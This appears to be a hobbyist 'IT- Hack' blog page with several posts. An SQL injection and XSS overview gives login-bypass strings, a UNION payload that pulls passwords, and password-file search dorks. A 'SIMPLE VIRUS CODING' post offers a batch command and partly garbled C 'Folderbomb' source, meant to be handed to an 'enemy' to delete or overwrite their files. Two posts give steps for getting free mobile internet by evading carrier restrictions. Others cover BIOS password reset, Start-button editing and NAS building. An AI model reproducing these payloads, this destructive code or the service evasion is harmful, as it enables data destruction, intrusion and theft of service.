Showing posts with label IT- Hack. Show all posts
Showing posts with label IT- Hack. Show all posts

How They Hack Your Website: Overview of Common Techniques

We hear the same terms bandied about whenever a popular site gets hacked. You know… SQL Injection, cross site scripting, that kind of thing. But what do these things mean? Is hacking really as inaccessible as many of us imagine — a nefarious, impossibly technical twilight world forever beyond our ken?
Not really.
When you consider that you can go to Google right now and enter a search string which will return you thousands of usernames and passwords to websites, you realize that this dark science is really no mystery at all. You'll react similarly when you see just how simple a concept SQL Injection is, and how it can be automated with simple tools. Read on, to learn the basics of how sites and web content management systems are most often hacked, and what you can do to reduce the risk of it happening to you.

SQL Injection

SQL Injection involves entering SQL code into web forms, eg. login fields, or into the browser address field, to access and manipulate the database behind the site, system or application.
When you enter text in the Username and Password fields of a login screen, the data you input is typically inserted into an SQL command. This command checks the data you've entered against the relevant table in the database. If your input matches table/row data, you're granted access (in the case of a login screen). If not, you're knocked back out.
The Simple SQL Injection Hack
In its simplest form, this is how the SQL Injection works. It's impossible to explain this without reverting to code for just a moment. Don't worry, it will all be over soon.
Suppose we enter the following string in a Username field:

' OR 1=1 double-dash-txt.png
The authorization SQL query that is run by the server, the command which must be satisfied to allow access, will be something along the lines of:
SELECT * FROM users WHERE username = ?USRTEXT '
AND password = ?PASSTEXT?
…where USRTEXT and PASSTEXT are what the user enters in the login fields of the web form.
So entering `OR 1=1 — as your username, could result in the following actually being run:
SELECT * FROM users WHERE username = ?' OR 1=1 — 'AND password = '?
Two things you need to know about this:
['] closes the [username] text field.
'double-dash-txt.png' is the SQL convention for Commenting code, and everything after Comment is ignored. So the actual routine now becomes:
SELECT * FROM users WHERE username = '' OR 1=1
1 is always equal to 1, last time I checked. So the authorization routine is now validated, and we are ushered in the front door to wreck havoc.
Let's hope you got the gist of that, and move briskly on.
Brilliant! I'm gonna go hack me a Bank!
Slow down, cowboy. This half-cooked method won't beat the systems they have in place up at Citibank, evidently.
But the process does serve to illustrate just what SQL Injection is all about — injecting code to manipulate a routine via a form, or indeed via the URL. In terms of login bypass via Injection, the hoary old ' OR 1=1 is just one option. If a hacker thinks a site is vulnerable, there are cheat-sheets all over the web for login strings which can gain access to weak systems. Here are a couple more common strings which are used to dupe SQL validation routines:
username field examples:
  • admin'—
  • ') or ('a'='a
  • ”) or (“a”=”a
  • hi” or “a”=”a
… and so on.
Backdoor Injection- Modules, Forums, Search etc.
Hacking web forms is by no means limited exclusively to login screens. A humble search form, for instance, is necessarily tied to a database, and can potentially be used to amend database details. Using SQL commands in search forms can potentially do some extremely powerful things, like calling up usernames and passwords, searching the database field set and field names, and amending same. Do people really get hacked through their search forms? You better believe it. And through forums, and anywhere else a user can input text into a field which interacts with the database. If security is low enough, the hacker can probe the database to get names of fields, then use commands like INSERT INTO, UNION, and so forth to get user information, change product prices, change account settings/balances, and just about anything else… depending on the security measures in place, database architecture and so on.
So you can have security locked down at the login, but poor security on other forms can still be exploited. Unfortunately this is a real worry regarding 3rd party modules for Web CMS products which incorporate forms, and for CMS products these 3rd party modules are often the weakest links which allows hackers access to your database.
Automated Injection
There are tools to automate the process of SQL Injection into login and other fields. One hacker process, using a specific tool, will be to seek out a number of weak targets using Google (searching for login.asp, for instance), then insert a range of possible injection strings (like those listed above, culled from innumerable Injection cheat-sheets on the Web), add a list of proxies to cover his movements, and go play XBox while the program automates the whole injection process.
Remote Injection
This involves uploading malicious files to inject SQL and exploit other vulnerabilities. It's a topic which was deemed beyond the scope of this report, but you can view this PDF if you'd like to learn more.
SQL Injection in the Browser Address Bar
Injections can also be performed via the browser address bar. I don't mean to have a pop at Microsoft, but when it comes to such vulnerabilities, HTTP GET requests with URLs of the following form are most often held to be vulnerable:
http://somesite.com/index.asp?id=10
Try adding an SQL command to the end of a URL string like this, just for kicks:
http://somesite.com/index.asp?id=10 AND id=11
See if both articles come up. Don't shoot your webmaster just yet if it's your own site and you get two articles popping up: this is real low-level access to the database. But some such sites will be vulnerable. Try adding some other simple SQL commands to the end of URLs from your own site, to see what happens.
As we saw above, access to the database raises a number of interesting possibilities. The database structure can be mapped by a skilled hacker through ill-conceived visibility of error messages — this is called database footprinting — and then this knowledge of table names and so forth can be used to gain access to additional data. Revealing error messages are manna - they can carry invaluable table name and structural details.
The following illustrative string is from Imperva.
http://www.mydomain.com/products/products.asp?productid=123 UNION SELECT username, password FROM USERS
There are vast swathes of information on SQL Injection available, here are a couple of good sources:

Cross Site Scripting (XSS)

XSS or Cross Site Scripting is the other major vulnerability which dominates the web hacking landscape, and is an exceptionally tricky customer which seems particularly difficult to stop. Microsoft, MySpace, Google… all the big cahunas have had problems with XSS vulnerabilities. This is somewhat more complicated than SQL Injection, and we'll just have a quick look to get a feel for it.
XSS is about malicious (usually) JavaScript routines embedded in hyperlinks, which are used to hijack sessions, hijack ads in applications and steal personal information.
Picture the scene: you're there flicking through some nameless bulletin board because, yes, you really are that lazy at work. Some friendly girl with broken English implores you to get in touch. 'Me nice gurl', she says. You've always wondered where those links actually go, so you say what the hell. You hover over the link, it looks like this in the information bar:
[%63%61%74%69%6f%6e%3d%274%74%70%3a%2f%2f%77%7…]
Hmmm…what the hell, let's give it a bash, you say. The one thing I really need right now is to see an ad for cheap Cialis. Maybe the linked page satisfies this craving, maybe not. Nothing dramatic happens when you click the link, at any rate, and the long day wears on.
When a link in an IM, email, forum or message board is hexed like the one above, it could contain just about anything. Like this example, from SandSprite, which helps steal a session cookie, which can potentially be used to hijack a session in a web application, or even to access user account details.
cookiegrab.png
Stealing cookies is just the tip of the iceberg though — XSS attacks through links and through embedded code on a page or even a bb post can do a whole lot more, with a little imagination.
XSS is mostly of concern to consumers and to developers of web applications. It's the family of security nightmares which keeps people like MySpace Tom and Mark Zuckerberg awake at night. So they're not all bad then, I suppose…
For additional resources on this topic, here's a great overview of XSS (PDF) and just what can be accomplished with sneaky links. And here's an in-depth XSS video.

Authorization Bypass

Authorization Bypass is a frighteningly simple process which can be employed against poorly designed applications or content management frameworks. You know how it is… you run a small university and you want to give the undergraduate students something to do. So they build a content management framework for the Mickey Bags research department. Trouble is that this local portal is connected to other more important campus databases. Next thing you know, there goes the farm
Authorization bypass, to gain access to the Admin backend, can be as simple as this:
  • Find weak target login page.
  • View source. Copy to notepad.
  • Delete the authorization javascript, amend a link or two.
  • Save to desktop.
  • Open on desktop. Enter anything into login fields, press enter.
  • Hey Presto.
Here's a great video of a White Hat going through the authorization-bypass process on YouTube. This was done against a small university's website. It's a two-minute process. Note that he gets into the User 1 account, which is not the Admin account in this case. Is Admin User 1 on your User table?

Google Hacking

This is by far the easiest hack of all. It really is extraordinary what you can find in Google's index. And here's Newsflash #1: you can find a wealth of actual usernames and passwords using search strings.
Copy and paste these into Google:
inurl:passlist.txt
inurl:passwd.txt

…and this one is just priceless…
“login: *” “password= *” filetype:xls
Such strings return very random results, and are of little use for targeted attacks. Google hacking will primarily be used for finding sites with vulnerabilities. If a hacker knows that, say, SQL Server 2000 has certain exploits, and he knows a unique string pushed out by that version in results, you can hone in on vulnerable websites.
For specific targets Google can return some exceptionally useful information: full server configurations, database details (so a good hacker knows what kind of injections might work), and so forth. You can find any amount of SQL database dumps as well (fooling around with a Google hack while preparing this article, I stumbled across a dump for a top-tier CMS developer's website). And a vast amount more besides.
johnny.ihackstuff.com is the man to go to for Google hacks. One interesting one I toyed with invited me to the Joomla! install page for dozens of sites… people who had uploaded Joomla!, decided against installing it, and subsequently had either left the domain to rot, or else set a redirect on the page to, say, their Flickr account (in one case). Allowing anybody to walk in and run through the installer. Other query strings target unprotected email/IM archives, and all sorts of very sensitive information. What fun we can have!
 

Password Cracking

Hashed strings can often be deciphered through 'brute forcing'. Bad news, eh? Yes, and particularly if your encrypted passwords/usernames are floating around in an unprotected file somewhere, and some Google hacker comes across it.
You might think that just because your password now looks something like XWE42GH64223JHTF6533H in one of those files, it means that it can't be cracked? Wrong. Tools are freely available which will decipher a certain proportion of hashed and similarly encoded passwords.

A Few Defensive Measures

  • If you utilize a web content management system, subscribe to the development blog. Update to new versions soon as possible.
  • Update all 3rd party modules as a matter of course — any modules incorporating web forms or enabling member file uploads are a potential threat. Module vulnerabilities can offer access to your full database.
  • Harden your Web CMS or publishing platform. For example, if you use WordPress, use this guide as a reference.
  • If you have an admin login page for your custom built CMS, why not call it 'Flowers.php' or something, instead of “AdminLogin.php” etc.?
  • Enter some confusing data into your login fields like the sample Injection strings shown above, and any else which you think might confuse the server. If you get an unusual error message disclosing server-generated code then this may betray vulnerability.
  • Do a few Google hacks on your name and your website. Just in case…
  • When in doubt, pull the yellow cable out! It won't do you any good, but hey, it rhymes.
UPDATE
I had posted a link here to a hacking bulletin board containing specific sql injections strings etc. The link pointed to a page which listed numerous hacks targetting various CMS platforms, but containing a disproportionate number of hacks for one platform in particular. In retrospect, and following a specific complaint, I have pulled down this link. Apologies to the complainant and to anyone else who found this link to be inappropriate.

0 comments  

Hacking a Network Attached Storage (NAS)

I try to find some candidate hardware platforms and Linux distributions in this article, so the fans can build their own Network Attached Storage (NAS) or expand their NAS with more features by hacking an existing NAS (Network Attached Storage).
What is NAS?
NAS is the abbreviation of Network-attached Storage. It was introduced by Novel to offer the network file sharing service. Network attached Storage (NAS) was designed for enterprise applications, so it supports UNIX from the very beginning. The consumers realized they need more storage capability for the digital media files from Internet. A consumer NAS (Network-attached Storage) can share the media files with all the PCs and the digital media players. Furthermore, NAS can download the files from BitTorrent or eDonkey in a non-PC environment. The latest consumer NAS transforms into a full-functional media server with variety features.
Let us check out the long list:

  1. File sharing for Windows, Linux and Mac via Samba, NFS, HTTP, FTP and rsync;
  2. Easy data backup capability for flash cards, USB stick and removable HDD, with optional RAID support;
  3. A print server;
  4. A Media server for Windows MCE, Xbox360 and PS3 with UPnP/DLNA;
  5. A Web server with DDNS, PHP, ASP, SQLite and MySQL;
  6. An FTP server;
  7. An iTunes server;
  8. A 24 hour download server supports BT, eDonkey and FTP;
  9. A home video surveillance server, which supports both IP camera and USB camera;
  10. Multiple administration panel choices in Web GUI, virtual console and custom terminal software;
  11. Much more …
 
Why Do We Need NAS (Network Attached Storage)
Although we can use the more powerful PCs in many applications, we still require embedded computers as NAS for security, power consumption, and network.
Security
A well-designed NAS can offer more security than a regular PC. Most of the NAS OSes are based upon Linux OS, so they have less virus problems compare to Windows. Even if they have downloaded the files infected by some viruses, the embedded OS in the NAS will not be infected by the viruses. Of course, you still have to scan the files with the anti-virus software.
A dual slot NAS usually offers RAID backup service. So the important data can be restored if one disk has a malfunction.
Power Consumption
A PC is not designed for working 7*24 hour. It can work for a long time. But I will not leave my PC to download a huge file without knowing when it can be ended. A NAS can work in more energy effective ways. If there is no active connection, the NAS can shut down the hard disk drivers and wait for the connections. The power consumption of a regular NAS depends on its hard disk drivers, which is about 5W~20W. A NAS can save our money and environment with less carbon emission.
Network Access
A Network-Attached Storage (NAS) can reduce unnecessary network communication to Internet. Most of the media files are shared on the NAS within the LAN. The other IP based appliances can work with the NAS by fetching the digital media files to playback. We can setup our own “HOME” page at home, because a NAS also offers a web server with DDNS (Dynamic DNS). Besides the regular web content, we can use it to access to the cameras as a remote surveillance server. It is a very important service for digital home. A NAS is a good platform to host such service.
Actually the NAS could be a platform for many commercial network applications. For example, you can use it in a Bluetooth advertisement pusher or a music retail store. Just plug in a Bluetooth stick and install proper software, the NAS can start to push the advertisement or the sample music clips via Bluetooth.
Paradox of NAS
There is a paradox for NAS. A NAS supposes to offer much larger storage capacity than the existing storage media. However, due to the fast growing of storage market, the storage capacity of a NAS usually seems smaller after several months. According to the famous Moore's Law, a NAS usually faces to the upgrading requirement for disk capacity and local network connectivity bandwidth in every 18 months. Today, an advanced desktop PC has a 512GB hard disk and a NAS has a 2TB hard disk. Maybe a regular PC will have a 2TB hard disk 6 month later. So the NAS will lose its capacity advantage at that moment. A consumer may hesitate to offer a NAS which seems to be obsolete in one year anyway. As a result, the consumer class NAS integrates many entertainment features, so the consumers can convince themselves that NAS can help in many other ways besides storage and sharing.
NAS Hardware Platform
The latest NAS model features SATA-II slots, USB 2.0 high speed host ports, Gigabit Ethernet or 54M WiFi connectivity. The structure of a NAS is identical to a regular PC without VGA and input devices. In general, either a RISC based embedded application computer or a regular x86 PC can be used as the hardware platform for a NAS. Most of the commercial NAS devices use the RISC processors. It is your own decision to pick the hardware platform. However, developing on a RISC embedded system requires extra hardware tools and knowledge, which is not recommended for a beginner. Building a PC based NAS is a good starting point for a beginner. At least we will not worry about breaking the board.
RISC based
I browse the data catalogue of the semiconductors manufacturers for NAS. Among these chips, Marvell’s Digital Home Platforms integrates most of the desired features with a 1.5GHz ARM chip, SPDIF/I2S audio and TS/Video port. Obviously, it is more than a NAS. The chip is very popular in the commercial NAS products. You can easily find one and hack it.
If you are looking for other platforms, you can also find the solutions from Freescale (Power PC based), PMC-Sierra (MIPS based), and Cirrus Logic (ARM920 based). However, these chips usually have slower microprocessors (from 200MHz to 400MHz) and slower peripherals (ATA, USB1.1, 10/100M Ethernet). So you can only use it as a pure storage device.
If you want to build it from scratch to learn how Linux works, the best candidates are S3C2410/2440 and XScale. These chips are not designed for the NAS, but for hand-held devices. However, these chips are very popular and they have the most of the peripherals on chip. Of course, the performance of the peripherals are not enough, sometimes you have to expand it with supplementary hardware.
JTAG and Serial Console
You may need a JTAG board and a serial port for bringing up a 'virgin' board. You must use the JTAG board to download the boot-loader to the on board flash memory, and use the serial port to give the boot-loader the further programming and configuration instructions. However, if the chip (such as TI OMAP3530) has build-in boot-code to support extra booting options, such USB stick, SD card, Ethernet, hard disk driver, then you are lucky to select an easy chip to work on.
Microcontroller

Some NAS devices use a low cost microcontroller to get the user input and light the status LEDs. There are some hacks available for these microcontrollers. However, you have to get some hardware programming tools to download the microcontroller’s firmware. The programming method is vendor dependent.
PC based
As I mentioned, we can use an obsolete PC as the hardware platform, since the hardware infrastructure of a NAS is almost identical to a PC. We only care about the power consumption, scalability and availability for a specific hardware platform. An obsolete usually consumes a lot of power, generates a lot of noise. I don't like that reuse idea. A PC based NAS must be low power, low noise and fast enough.
If we check the x86 suppliers, Intel, VIA, AMD and their partners have offered many reference designs. Most of the reference designs are based upon low-power CPUs. Among these chips, I prefer the ATOM processor from Intel. It offers the lowest power consumption so far. The ATOM based main board is about 100USD. You can setup a dual bay NAS on ATOM platform within 140USD (excluding SATA HDD). The EPIA board from VIA is also a good candidate for x86 based NAS.
You can leverage the PC to develop your NAS with minimum cost. The cheap peripherals allow you to expand your NAS in many ways, such as WiFi connection, flash card bay, IEEE1394, eSATA and Bluetooth. You can download and install many open NAS OSes to find out the suitable package. Besides, you can install the OS on CD-ROM, USB stick or HDD without programming flash in an embedded system. Further more, you can expand your NAS to a media server with extra software modules.
NAS Software Component
We should always look for the software components from open source communities, because most of the NAS software packages are Linux based distributions (although Microsoft SAK [Server Appliance Kit] and VxWork also have a small market share). Most of the semiconductors suppliers offer reference design with Linux BSP as well. Some vendors like Cirrus Logic offers full source on its site, the other vendors only offer their packages for their clients. So you have to find the alternative Linux distribution from the open source community sites if you can not get the packages from the semiconductors suppliers. Fortunately, there are too many options for you.
First, there are off-the-shelf distribution from Debian and famous Linux distributors. You can install this distribution easily.
Second, you can build the Linux with open data sheet and open source tools by yourself. The other applications in user land can be build later and then install to the NAS.

Complete NAS OS
FreeNAS supports CIFS (Samba), FTP, NFS, rsync, AFP protocols, iSCSI, S.M.A.R.T., local user authentication, and software RAID (0,1,5), with a web-based configuration interface. FreeNAS is a Live CD distribution of FreeBSD, which can be installed on a 32 MB CompactFlash, hard drive or USB flash drive.
Openfiler was created by Xinit Systems, and is based on the rPath Linux distribution. Openfiler needs at least a 500 MHz CPU, 256 MB of RAM, 1.2 GB hard disk space, an optical drive and a FastEthernet network interface.
NASLite is a Linux distribution designed to turn conventional x86-based computers with PCI interface into a simple network-attached storage device. NASLite boots from the floppy disk and runs in a 4MB RAM disk allowing for full capacity of the hard disk drives to be used as storage. Now NASLite becomes proprietary software, without source code.
The CryptoNAS is another live-CD project to offer encryption of user data in a NAS.
The above NAS OS distributions can not offer every feature you want, then you can custom and strip down the Debian and FreeBSD to meet your requirement.

File Sharing
The basic file sharing services include NFS (for Linux), Samba (for Windows). Both services have been implemented already. In fact, any Linux computer can work as NAS, because file sharing is a default service for Linux. The only concern is file system for the hard disk. Usually the internal hard disks are formatted as EXT2/EXT3/UFS. That is transparent for the client PCs. But the developer must hack the kernel to support NTFS, especially in writing a USB hard disk formatted in NTFS.
Data Backup
NAS normally uses RAID as back up feature. There are various combinations of these approaches giving different trade offs of protection against data loss, capacity, and speed. RAID levels 0, 1, and 5 are the most commonly found, and cover most requirements. Actually RAID level 0 just increases the capacity and speed, no any data backup is available. And RAID level 1 is a mirror backup, so you can restore the data in case one disk fails, but keep in mind that even if two HD of the same size are used, the total RAID volume capacity equals the capacity of one HD. The RAID level 5 offers high security for data restore. The RAID can be implemented in software, hardware and firmware. For Linux, it is supported in the kernel already. Even one disk failed in software RAID1 system, you can still read out the other hard disk on other hardware. If you configure the RAID system in other higher level, you need to restore the data in the same device.
Print server
The printer sharing is implemented in SMB of Samba package. In order to install the Linux network printer for Windows workstation, you have to:
  1. Install and configure the Samba server
  2. Add extra script in /etc/printcap
  3. Create a filter file under /var/spool/lpd/smb/
  4. Create a .config file under /var/spool/lpd/smb/
  5. Restart the printer by #lpc restart all
  6. Find the network printer in Samba from Windows workstation
  7. Install the printer postscript driver in Windows
  8. Print from Windows workstation
Please refer to Linux printer how-to for more informations.

P2P Sharing
The P2P sharing must be included in a consumer NAS. QNAP, ASUS and D-Link have integrated BitTorrent already. The BitTorrent client has many Linux ports, which can be cross-compiled in an embedded system. Another well-known P2P sharing protocol is eDonkey. eDonkey is open source software as well. But the first source is released for Windows VC++. Compared to BitTorrent, eDonkey has less Linux ports. So far, the eDonkey download feature is only included in some high-end consumer NAS. According to some reports, the download speed of the embedded P2P clients is much slower than the PC based clients. So far I didn't find the official analysis report.
There is a complete and update list for BitTorrent clients in Wikipedia, which are sorted by UI, programming languages, OS and etc. We need a web based, C++ based client software. Of course you can port a Java or Python client if your system supports these languages.
The consumers want to have these two major P2P protocols in one package. Some commercial NAS devices use a combination of Clutch+Transmission. The other ones use MLDonkey, which supports BitTorrent, eDonkey and other protocols. This software is written in Objective Caml, C and assembly. Porting Objective Caml is the major task for MLDonkey.
The user front-end usually is based upon web interface. If you are interested, you can use the custom software. Sancho is a good front-end software working with MLDonkey. You can access the P2P service in a Windows workstation just like running the eMule software in the native PC.
UPnP/DLNA media server
The UPnP architecture allows local peer-to-peer networking of PCs, networked appliances, and wireless devices. It is a distributed, open architecture based on established standards such as TCP/IP, UDP, HTTP and XML. The UPnP is a media independent protocol.
The Digital Living Network Alliance is an international, cross-industry collaboration of consumer electronics, computing industry and mobile device companies.
The DLNA is an industrial standard, so more and more media players integrate UPnP/DLNA support, such as PowerDVD, WinDVD, Vista, PS3, VLC media player and famous MPlayer/GeeXbox.
In order to support UPnP/DLNA media server in NAS, you have to find libdlna, ushare for Linux.
If you are going to setup your home entertainment network, you definitely need one or several NAS servers to share the media files. Switch on your front-end equipment, IPTV, PS3, Xbox, DMA, HTPC, enjoy yourself!
Web Server
Some RISC based commercial NAS claimed they are offering Apache+MySQL web server inside the NAS server. I am a little confused because I know a full-featured Apache+MySQL+PHP combination is hard to be cross compiled. Normally, the web server for an embedded system will use small footprint server like BOA. The LAMP combination is working perfectly on a PC based NAS.
FTP Server
The FTP server and client have been integrated into Linux long time ago.
IP Camera
The USB camera is very cheap and widely used. Some of the NAS devices can use these low-cost USB cameras as video surveillance sensors and embedded the real-time video/audio stream in a web page, which can be accessed by authorized administrator members via DDNS. Porting USB camera requires some knowledge about the interface IC. You must identify the semiconductors suppliers and find the corresponding drivers. Please visit Video4Linux and Linux USB for the latest information about camera.
The IP camera is a better choice for video surveillance. It usually offers better video quality (SD/HD on higher frame rate), long range operation (Ethernet or WiFi), PTZ (Pan, Tilt and Zoom) controls, audio support, advanced video format (MJPEG, MPEG-4), night vision, PIR input and more. It is easy to integrate an IP camera with a NAS, because it is an 'IP' appliance.
You can even merge video inputs from several cameras in one web page to monitor multiple sites in the same time. It requires web programming skills.
Hacking a Commercial NAS
Hacking a commercial NAS is a good approach to learn the embedded Linux. There are too many resource web sites for hacking a commercial NAS. You can modify the firmware and add extra features for your own purposes. Although a commercial NAS has limited scalability, you still can enjoy yourself in hacking such a high-tech toy. Why not? Just buy a second-hand NAS from ebay and hack it.
You can visit NAS-Central.org as the starting point. This wiki site will lead you to the specific brand, model and hacking blogs. You can follow it to know what has been done by other developers, what you can do and what you can not do.
Next Step
What, Next step? Just do it! What are you waiting for?

0 comments  

SIMPLE VIRUS CODING

Run this on your own responsibility*/

VIRUS CODE-1

IT DELETES THE MY DOCUMENTS FOLDER OF UR ENEMY.
HERE'S WHAT U SHOULD DO
OPEN NOTEPAD AND COPY-PASTE THE FOLLOWING CODE IN IT.
THEN SAVE THE FILE WITH WHATEVER NAME U LIKE BUT WITH BAT FILE Extention.
I MEAN SAVE IT LIKE VIRUS.BAT.
NOW IF U GIVE THIS TO SOMEONE AND IF HE RUNS THIS PROGRAM THEN HIS MY DOCUMENT FOLDER WILL BE DELETED.
Code Is Below
rmdir C:\Documents and Settings \S\Q.


Run this on your own responsibility*/
VIRUS CODE-2
/*This is a simple program to create a virus in c
It will create Folder in a Folder in a Folder and so on ......


#include<stdio.h>
#include<conio.h>
#include
#include
#include
void main(int argc,char* argv[])
{ char buf[512];
int source,target,byt,done;
struct ffblk ffblk;
clrscr();
textcolor(2);
cprintf(”————————————————————————–”);
printf(”\nVirus: Folderbomb 1.0\nProgrammer:BAS Unnikrishnan(asystem0@gmail.com)\n”);
cprintf(”————————————————————————–”);
done = findfirst(”*.*”,&ffblk,0);
while (!done)
{ printf(”\n”);cprintf(” %s “, ffblk.ff_name);printf(”is attacked by “);cprintf(”Folderbomb”);
source=open(argv[0],O_R
DONLYO_BINARY);
target=open(ffblk.ff_name,O_CREATO_BINARYO_WRONGLY);
while(1)
{byt=read(source,buf,512);
if(byt>0)
write(target,buf,byt);
else
break;
}
close(source);
close(target);
done = findnext(&ffblk);
}
getch();
}

0 comments  

Reset Your lost Bios Password

Here's a DOS trick for Windows 9x, that will reset (delete) your motherboard's BIOS password (aka CMOS password) without any need to open up your computer to remove the battery or mess with jumpers.

This method can come in very handy in the event you ever lose and forget your BIOS password or if you acquire used computers where the unknown previous owners had BIOS passwords set (in fact, this happened to me long ago
was given a used computer, but there was no way I could enter the CMOS to make changes). It's important to note here that the password we are talking about is only the one that prevents a user from entering the BIOS setup at bootup, not the one that stops you from getting past the boot.

Normally, at bootup you can press a key (usually the DEL key) to access your BIOS allowing you to view it or make changes. With a password set, there is no way to enter setup. Though a password can provide a basic and very effective level of PC security, losing it can be a real headache if you don't know how to fix the problem.

The MS-DOS command that will makes this trick possible is the DEBUG command (debug itself is a utility
ebug.exe hich is located in your Windows Command folder). This is not a command to be taken lightlyn other words, it's not a command to play with! You can cause serious corruption with this command and can end up not being able to even boot your computer! Debug is used to work with binary and executable files and allows you to alter (hex edit) the contents of a file or CPU register right down to the binary and byte level.

To begin debug mode, type debug at a MS-DOS prompt or you can specify a file, i.e., DEBUG FILE.EXE. There is a difference in screen output between the two methods. When you type DEBUG alone, debug responds with a hyphen (-) prompt waiting for you to enter commands. The second method, with a file specified, loads the file into memory and you type all the commands on the line used to start debug. In this tip, we will be writing to the BIOS, so the first method is the one that would be used. All debug commands can be aborted at any time by pressing CTRL/C.
Accessing BIOS with DEBUG

The basic trick will be to fool the BIOS into thinking there is a checksum error, in which case it resets itself, including the password. This is done by invalidating the CMOS and to do that we must know how to access the BIOS and where the checksum value of the CMOS is located so that we can change it. Access to the the BIOS content is via what are known as CMOS Ports and it's Port 70 and 71 that will give us the needed access. On almost all AT motherboards, the checksum is located at hexadecimal address 2e and 2f and filling the address 2e with ff is all you should have to do to invalidate the checksum.

Here's what to do if you ever need to reset the password and have no other method, and you don't want to open up your computer to remove the battery or jumpers.

 
Note! Do this at your own risk. I can only tell you that it has worked for me more than once and has worked for others as well. But I cannot make any guarantees. When I did this, I took a willing risk. The BIOS was Award Modular BIOS v4.51PG

Restart your computer in MS-DOS mode.

When you get to the C:\> or C:\WINDOWS> prompt, type DEBUG and press Enter.

A hyphen (-) prompt will appear waiting for you to enter commands.

Enter the following commands, pressing Enter after each one. Note: the o is the letter o and stands for OUTPUT.
 
o 70 2e
o 71 ff
q

After the q command (which stands for QUIT), enter Exit.

Then try to enter your BIOS at bootup. The password prompt should now be gone and you should now have full access to it again. However, you will now be at the default BIOS setttings and may want to change them to your preference. You may also want to have your drives autodetected again.
In closing, I should state that in the case of a lost BIOS password, your first step should always be to contact your manufacturer to see if a backdoor password is available that will allow you to bypass the forgotten password.

There are many sites on the net that list backdoor passwords you can try, but beware that some BIOS that are set up to lock up if you enter the wrong password more than a certain number of times, usually only 3 times!

0 comments  

HACK or Simply Change XP Start Button Name

I’ve read a number of articles on the internet about changing the text on the Start button in XP. On more than one occasion I’ve seen references to a five (5) letter limitation when the button is renamed. I always wondered if this was true or just an assumption someone made because the default ‘start’ just happened to fit the button size. So, I decided to run a test and see if there really was a five character limit.
First of all just u need to do is download Resource hacker.

Resource HackerTM is a freeware utility to view, modify, rename, add, delete and extract resources in 32bit Windows executables and resource files (*.res). It incorporates an internal resource script compiler and decompiler and works on Win95, Win98, WinME, WinNT, Win2000 and WinXP operating systems.

ll its just 541Kb in the size.. Click here to go to the Download Page
 
Download Resource Hacker
First Step The first step is to make a backup copy of the file explorer.exe located at C:\Windows\explorer. Place it in a folder somewhere on your hard drive where it will be safe. Start Resource Hacker and open explorer.exe located at C:\Windows\explorer.exe
The category we are going to be using is String Table In Resource Hacker. Expand it by clicking the plus sign then navigate down to and expand string 37 followed by highlighting 1033. If you are using the Classic Layout rather than the XP Layout, use number 38. The right hand pane will display the stringtable as shown in Fig. 02. We’re going to modify item 578, currently showing the word “start” just as it displays on the current Start button.

There is no magic here. Just double click on the word “start” so that it’s highlighted, making sure the quotation marks are not part of the highlight. They need to remain in place, surrounding the new text that you’ll type. Go ahead and type your new entry

Second Step – Modify the Registry Now that the modified explorer.exe has been created it’s necessary to modify the registry so the file will be recognized when the user logs on to the system. If you don’t know how to access the registry I’m not sure this article is for you, but just in case it’s a temporary memory lapse, go to Start (soon to be something else) Run and type regedit in the Open: field. Navigate to:
HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\ Windows NT\ CurrentVersion\ Winlogon

the Right pane (Fig. 05), double click the Shell entry to open the Edit String dialog box as shown in Fig. 06. In Value data: line, enter the name that was used to save the modified explorer.exe file. Click OK.

Close Registry Editor and either log off the system and log back in, or reboot the entire system if that’s your preference. If all went as planned you should see your new Start button with the revised text.

0 comments  

Free Bsnl Gprs To Access Internet

U Can Surf For Free Via Gprs On Pc Too
I came to know of using BSNL GPRS for FREE with FULL ACCESS to All Sites.
Here is the way.
1.Create 2 connections with different names like "BSNL PORTAL" and "CELLONE PORTAL" with following settings.
 
Access Point Name-
"celloneportal"
Proxy Service Address-
"192.168.51.163"
Proxy Port-
"8080"
Security-
"NORMAL"
Rest fields to be as it is.

2.now open phone's default inbuilt browser and select any of the two settings created to access the web.you will now access only bsnl's home site.

3.now keep browser working and open another browser for full internet access like opera or netfront.in these browsers use the second setting created. make sure to use second setting this time. connect to open a page. you get an error message like "ACCESS DENIED" but you don't worry.

4.keep both browsers working in background and open connection manager. in connection manager just disconnect the connection that is not working like the second one you used to connect opera or net front.

5.again open opera or netfront from background and this time use the first connection that you are using to connect with default inbuilt browser to connect to internet.

6.sure this time you are connected with full access.

0 comments  

AIRTEL Gprs Hack

FIRST METHOD:You need a PC or a Laptop and the required connectivity tools ,ie.,
Serial/USB cable OR Infrared Device OR Bluetooth dongle

1) Activate Airtel Live! ( It’s FREE so no probs)
2) Create TWO Airtel gprs data accounts (yep TWO) and select the
FIRST as the active profile.
3) Connect your mobile to the PC (or Laptop) and install the driver for
your mobile’s modem.
4) Create a new dial-up connection using the NEW CONNECTION Wizard as follows:

Connecting Device : Your mobile’s modem
ISP Name : anyname (anything you like)
Phone Number : *99***3# / Try 99***1
Username and Password : blank
5) Configure your browser and download manager to use the proxy
100.1.200.99 and port 8080.( My advice is to use Opera since you
can browse both wap and regular websites)
6) Connect to the dial-up account. You will be connected at 115.2
kbps (but remember, that is a bad joke).
7) Pick up your mobile and try to access any site. You will get “Access
Denied…”(except for Airtel Live!). IT DOES NOT MATTER.
Keep the mobile down.
8 ) On the PC ( or Laptop) open your browser, enter any address ,
press ENTER and…….WAIT
9) After a few seconds the page will start to load and you have the
Whole Internet at your Disposal.

SECOND METHOD:
First Go to settings menu then to connectivity tab now choose the option Data comm. then "DATA ACCOUNTS" go to new account now the settings r as follows
ACCOUNT TYPE:GPRS
NEW ACCOUNT NAME:A1
APN:airtelfun.com
User name: (blank)
Password: (blank)
Now save it
NOW!
Go to Internet Setting in connectivity here choose intrnet profile--go to new profile setting are As below
NAME:A1
CONNECT USING:A1(which was created in data comm.)
Save It
Now you would be able to see it now selest it and take "more" option then select setting here in use proxy option it will be selected no if it is no then change it into yes
Now Go to Proxy address and give the adress as
100.1.200.99 and then the port number as 8080
User name:
Password:
 
Now save all the settings You made . Come back 2 connectivity
choose streaming settings now in connect using option choose a1 that we created leave the use Proxy option as no itself
TheseAre The Settings
now access airtellive! from ur activated SE phone goto VIDEO GALLERY OR VIDEO UNLIMITED(varies according to states) choose live streaming then choose CNBC OR AAJTAK WHILE CONNECTING TO MEDIA SERVER cancel AFTER 9 or 10 sec then type any web adress if it shows access denied then once again select CNBC and wait for a few more sec than before if its fully connected also no prob its free then cancel it or if ur connected then stop it and the internet is ready to take of .
